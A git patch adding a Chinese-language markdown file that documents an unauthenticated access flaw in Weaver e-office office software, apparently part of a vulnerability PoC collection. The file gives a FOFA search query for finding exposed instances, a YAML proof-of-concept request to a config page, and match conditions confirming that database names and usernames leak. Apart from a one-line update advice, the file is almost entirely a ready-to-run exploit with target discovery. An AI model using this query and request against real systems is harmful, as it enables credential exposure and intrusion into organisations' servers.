From 2246d3d7d19b4394b404cca40fad0ce67d0ca6c6 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Fri, 20 Oct 2023 13:22:07 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E6=B3=9B=E5=BE=AEe-office=20=E6=9C=AA?=
 =?UTF-8?q?=E6=8E=88=E6=9D=83=E8=AE=BF=E9=97=AE.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 泛微e-office 未授权访问.md | 55 ++++++++++++++++++++++++++++++++++++++
 1 file changed, 55 insertions(+)
 create mode 100644 泛微e-office 未授权访问.md

diff --git a/泛微e-office 未授权访问.md b/泛微e-office 未授权访问.md
new file mode 100644
index 0000000..b168902
--- /dev/null
+++ b/泛微e-office 未授权访问.md	
@@ -0,0 +1,55 @@
+## 泛微e-office 未授权访问
+
+## fofa
+```
+(body="login.php"&&body="eoffice")||body="/general/login/index.php"
+```
+
+## POC  yaml格式
+```
+detail:
+  ID: 5285
+  Author: 匿名作者
+  Name: 泛微e-office 未授权访问
+  Description: 泛微e-office是一种企业办公自动化软件解决方案，由中国的泛微网络科技股份有限公司开发和提供。它旨在帮助企业提高办公效率、优化业务流程和信息管理。泛微e-office
+    存在未授权访问，攻击者可以访问页面获取敏感信息。
+  Identifier:
+    DVB: DVB-2023-5285
+  VulnClass:
+  - 认证绕过/未认证
+  Category:
+  - 应用服务
+  Manufacturer: 泛微
+  Product: e-office
+  Type: 1
+  Status: 1
+  Scanable: 1
+  Level: 2
+  DisclosureDate: '2023-10-18'
+  Is0day: false
+  IncludeExp: false
+  Weakable: false
+  IsXc: false
+  IsCommon: false
+  IsCallBack: false
+  Condition: (body="login.php"&&body="eoffice")||body="/general/login/index.php"
+  Solutions:
+  - 请关注厂商的修复版本，并及时更新到最新版本.
+poc:
+  relative: req0
+  session: false
+  requests:
+  - method: GET
+    timeout: 10
+    path: /building/backmgr/urlpage/mobileurl/config_2.php
+    headers:
+      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
+        Gecko) Chrome/83.0.2597.132 Safari/537.36
+    follow_redirects: true
+    matches: (code.eq("200") && body.contains("数据库名") && body.contains("用户名"))
+```
+
+## 漏洞复现
+/building/backmgr/urlpage/mobileurl/config_2.php
+
+